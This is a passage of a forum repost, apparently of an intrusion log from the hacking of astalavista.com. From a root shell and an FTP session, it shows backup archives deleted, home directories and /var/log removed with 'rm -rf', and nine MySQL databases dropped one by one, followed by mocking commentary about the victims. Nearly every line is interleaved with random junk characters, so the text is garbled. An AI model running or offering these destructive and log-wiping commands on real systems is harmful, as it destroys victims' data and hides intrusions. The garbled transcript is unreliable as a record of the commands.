227 Entering Passive Mode (212,254,194,163,2,189). n' u- U' q) c; j8 {
150 Opening BINARY mode data connection for ‘file list’.
9 b. N1 l u# w. j. [! F4 K-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
1 d7 ^! c. s, q; k6 E3 d-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
5 d+ M3 z7 D7 C-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
% _" U6 N# y" a5 E8 C-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
& }1 [3 k2 @. O" J+ ^- E-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
7 Y. f3 M( I. s8 w[snip]5 }9 A+ U4 B6 \5 X7 @# }* _
226 Transfer complete.- @: m- o+ D! k8 q6 G% O4 L
ftp> mdelete *& U6 G0 B$ g- j: d( Z
ftp> ls -la' v) M- @4 g6 N5 d# C
227 Entering Passive Mode (212,254,194,163,2,193)
) v2 H1 c2 I) ]3 {150 Opening BINARY mode data connection for ‘file list’.% a' i" u4 O2 o/ {% w+ d
226 Transfer complete.
+ p3 W! R) ~( uftp>; ?/ P' H* R8 s+ d# C' Q
0 o. ]. h% K# _* m4 N
sh-3.2# cd /home
% D# O4 o' ?* j W6 ]: Qsh-3.2# ls -la
( l' V' M! X) B. i7 l# Stotal 120, u/ y3 |8 O( S& I# I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
Y4 z, Y& \4 @2 s# k1 Zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
?9 \: f; r M) @1 @+ ~ Gdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin( G) m' E! Y4 W2 @
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
/ Z, {: v& f. ?) C% n4 r-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ e# @6 ?3 H/ u5 odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
; \0 X) Y) _: E f, K" x. ?5 Ddrwxr-xr-x 2 root root 4096 Jul 29 2008 backup c! V, c- F, r, y) ~
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
& I: q% T9 ]4 X# w% Odrwx–x–x 10 com com 4096 Apr 28 12:40 com' d, C) {$ W1 {4 ]& O
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
: ] k( \1 G6 l" l' Ldrwx—— 3 jon jon 4096 Sep 21 2007 jon" M% j0 `0 O0 a, l
drwx—— 2 root root 16384 Sep 11 2007 lost+found1 E" \, Q/ i7 s- Q0 P
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 f) T: p/ r+ J8 Cdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata$ A. S$ @# T; ^ U2 q
drwx—— 2 jon jon 4096 Sep 15 2007 test
6 q* K+ W0 W3 v+ e. ]! r. {8 r- jdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
# d' _: j+ W0 j- D$ ?% _! R# r6 b( s( D& B0 U
sh-3.2# rm -rf backup/
/ l$ F. f9 M; W$ ^: @sh-3.2# rm -rf backup.14161/# a* D& i2 X, m6 u3 s6 I h5 D
sh-3.2# rm -rf ftp/
7 u1 E% W; l1 J; |1 R5 Lsh-3.2# rm -rf jon/0 O. h* z8 K6 W0 s3 ]
sh-3.2# rm -rf my/
" U" z- q# _" p8 o7 F3 ~sh-3.2# rm -rf mysqldata/: W* Q3 a) p: E% u( R
sh-3.2# rm -rf test/* D* U2 t! A R8 V2 Y, E
sh-3.2# rm -rf tmp/& y. l. H) F' n
sh-3.2# cd ~
" y7 Y3 L, A% c% d# osh-3.2# rm -rf *+ o$ Y- N: z* P# D8 C# @8 Q
sh-3.2# rm -rf /var/log/' n4 P8 Q5 F4 B' D- i" ~1 P
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
J& B" ]) ?5 [6 Bsh-3.2# rm -rf /home/*
) e, o8 H; z! \! \sh-3.2# mysql+ p1 g# z6 G! g. L7 C
Welcome to the MySQL monitor. Commands end with ; or \g.
1 R: h4 X. }/ s7 R( wYour MySQL connection id is 407156
5 l& S3 t* x9 g0 ]5 [Server version: 5.0.45-community-log MySQL Community Edition (GPL)
W: v1 K* Z7 m4 M' A+ i' s) |; b8 }! u j- k v- X( w
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 i( Q& I2 X; Q9 J1 _1 F; G) I" u4 z3 l7 @. O1 ?6 D
mysql> show databases;
- O5 ^/ y5 @! _+ w; z5 b$ c+———————–+
+ c9 w9 u G! p. S! b, l, ^; y| Database |+ x- z, W3 `* s8 m% m* p
+———————–+
9 G1 @5 u- u6 s| information_schema |
, k+ K A4 {6 j3 `# k; Y3 P| astanet_ads |- j% R" ]) F9 c1 R" b# e
| astanet_mailing_lists |
% l; ]9 x/ c. i6 X; E/ y| astanet_mediawiki |& P( O9 s3 f4 y6 l
| astanet_membersystem |
2 n: q; o' I+ ]: N2 \ Y1 V6 @| com_contrexx |
6 N+ i, E% I$ e1 P y| com_contrexx2 |
/ q. j- m+ E( T: B| com_contrexx2_live |+ ~3 r1 B/ W' E% B5 s6 v! A
| da_roundcube |
! Z' v5 Y7 o2 b+ b| dolphin |; D) B8 a. S& d) \8 Z* c! y
| ideapool |0 E& H' B2 j }2 [+ t
| mysql |, W6 y% m. O" N) I% C
| test |9 }! J2 a0 v8 \
| yourmaster |. s* i- ^6 s/ z! w) m: F% `* ?0 t
+———————–+
7 ?. M2 ^$ [& x! d+ c1 W14 rows in set (0.03 sec)
7 T: k7 ]3 f" c( D2 W/ O) {# q; y* [/ [
mysql> drop database astanet_membersystem;
! q, R: v2 t' a0 IdroQuery OK, 46 rows affected (0.81 sec)- d I* _# ^! a. M" c! h) C" w# @
7 h* H5 j! x# G, h$ a$ Omysql> drop database com_contrexx;
: J2 E( }% _3 \! q3 FQuery OK, 211 rows affected (2.72 sec)3 }- T- @3 b3 d* s
; v# k& J, K! B4 B$ G) k% smysql> drop database com_contrexx2;4 N9 q/ m6 F+ @9 ^: M) J
Query OK, 237 rows affected (2.23 sec)3 T& L$ i. U! W- B; p& o1 u0 P9 @
1 h/ Q( |( x3 \ \/ o, y
mysql> drop database com_contrexx2_live;
2 t! }6 j' z4 m) }Query OK, 227 rows affected (7.63 sec)
4 K+ p. Q) v+ z' i3 r Y4 f' I- I k1 m6 n- t
mysql> drop database ideapool;1 g: d, V# J" `1 ~1 H1 {3 M3 o
Query OK, 69 rows affected (0.19 sec)& o' h* A) v% v) [
9 s: X& z5 D# O3 ]& m+ c! Wmysql> drop database yourmaster;
, H# g d4 ^4 p& O$ e4 aQuery OK, 158 rows affected (0.55 sec)
& D4 A; x9 t8 P) |9 d) }8 S7 t9 b% r5 s
mysql> drop database astanet_ads;
7 H+ n6 \: S ^6 x( g9 C4 I' ~Query OK, 9 rows affected (0.11 sec)5 b" v( ]5 }: w9 A8 d
3 S" P: G0 `' f8 H# v8 X
mysql> drop database astanet_mailing_lists;
- T7 q& A$ x L S& N5 u" L; QQuery OK, 24 rows affected (1.47 sec)$ p- u+ P3 B4 C1 @- t. F
% n5 [! J) j& W/ c
mysql> drop database astanet_mediawiki;. h: n& O' g( ~2 }
Query OK, 31 rows affected (0.51 sec), a4 K* O* m5 ?& b
8 O) C6 `1 c" Y- P: x: k3 Z! K, v. Smysql> show databases;
, ^7 |7 ~8 h9 i4 H. n" ?$ U4 L+——————–+
. {' K6 B4 u) ^' x| Database |
, X1 S O/ o* [0 k+ Z+——————–+ g2 q1 o$ ?+ W1 R/ r& _
| information_schema |
& @; b$ |- e0 @| da_roundcube |
% [& f4 \6 k5 L| dolphin |
4 T( I( J7 H( V| mysql |
0 M& k$ u' T& ]1 P8 Z| test |
( h) J. s1 t7 J9 t4 a" { q" S! V3 p+——————–+: }# o2 C* Y6 y A/ ~& z! u
5 rows in set (0.00 sec)
0 B7 n7 H8 X% W/ D, G3 C! V# z+ D1 a; P
What a journey! We’re not sure exactly why the “Terminator” had any influence on" @/ B, V6 F+ G* Q! u$ W8 r0 Y; Z
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the: D% n- e! l' l2 }
wrong to say this pack of morons *wont be back*.# D3 `) w. Y3 Q8 q k7 ~9 V
|
发表于 2012-11-6 21:07:34
收藏
支持
反对